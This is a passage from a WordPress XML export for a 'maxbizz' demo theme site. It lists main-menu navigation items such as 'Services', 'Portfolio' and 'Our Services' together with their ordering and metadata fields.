		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>25</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1022]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1002]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/1016/</link>
		<pubDate>Tue, 22 Sep 2020 03:23:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1016</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1016</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 03:23:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 03:23:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1016]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>24</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1022]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[999]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/1017/</link>
		<pubDate>Tue, 22 Sep 2020 03:23:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1017</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1017</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 03:23:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 03:23:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1017]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>23</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1022]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[996]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/1018/</link>
		<pubDate>Tue, 22 Sep 2020 03:23:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1018</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1018</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 03:23:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 03:23:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1018]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>22</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1022]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[977]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/1019/</link>
		<pubDate>Tue, 22 Sep 2020 03:23:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1019</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1019</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 03:23:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 03:23:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1019]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>21</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1022]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[959]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/1020/</link>
		<pubDate>Tue, 22 Sep 2020 03:23:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1020</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1020</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 03:23:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 03:23:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1020]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>20</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1022]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[898]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Services 2</title>
		<link>http://wpdemo.archiwp.com/maxbizz/1021/</link>
		<pubDate>Tue, 22 Sep 2020 03:23:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1021</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1021</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 03:23:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 03:23:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1021]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>5</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[363]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[885]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Services</title>
		<link>http://wpdemo.archiwp.com/maxbizz/1022/</link>
		<pubDate>Tue, 22 Sep 2020 03:23:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1022</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1022</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 03:23:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 03:23:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1022]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>19</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[868]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/1040/</link>
		<pubDate>Tue, 29 Sep 2020 08:27:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1040</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1040</wp:post_id>
		<wp:post_date><![CDATA[2020-09-29 08:27:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-29 08:27:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1040]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>17</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1041]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[861]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio-2/</link>
		<pubDate>Tue, 29 Sep 2020 08:27:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1041</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1041</wp:post_id>
		<wp:post_date><![CDATA[2020-09-29 08:27:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-29 08:27:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>14</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[847]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/1042/</link>
		<pubDate>Tue, 29 Sep 2020 08:27:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1042</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1042</wp:post_id>
		<wp:post_date><![CDATA[2020-09-29 08:27:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-29 08:27:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1042]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>16</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1041]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[858]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Services 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services-1/</link>
		<pubDate>Tue, 29 Sep 2020 08:27:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1043</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1043</wp:post_id>
		<wp:post_date><![CDATA[2020-09-29 08:27:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-29 08:27:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-services-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>4</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[363]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[868]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
